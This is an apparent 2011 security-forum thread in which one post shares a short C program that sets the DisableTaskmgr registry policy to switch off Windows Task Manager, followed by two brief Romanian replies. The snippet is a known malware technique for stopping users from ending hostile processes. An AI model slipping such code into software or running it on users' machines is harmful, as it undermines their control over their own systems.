Nytro Posted January 28, 2011 Report Share Posted January 28, 2011 [C] Disable Task Manager #include <windows.h>int main(){ DWORD dwVal = 1; HKEY hKey; RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS, &hKey); RegSetValueEx (hKey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD)); RegCloseKey(hKey); return 0;}Sursa: Disable Task Manager - r00tsecurity Quote Link to comment Share on other sites More sharing options...
robertutzu Posted January 28, 2011 Report Share Posted January 28, 2011 cica de unde ai preluat articolul "Have 200+ posts? I'll hack anything for you =)" )) cum e aia cu suicide bomber Silence i`ll kill u! Quote Link to comment Share on other sites More sharing options...
crs12decoder Posted January 31, 2011 Report Share Posted January 31, 2011 Simplu. Usor de refacut. Ma gandeam ca e ceva mai "nou" Quote Link to comment Share on other sites More sharing options...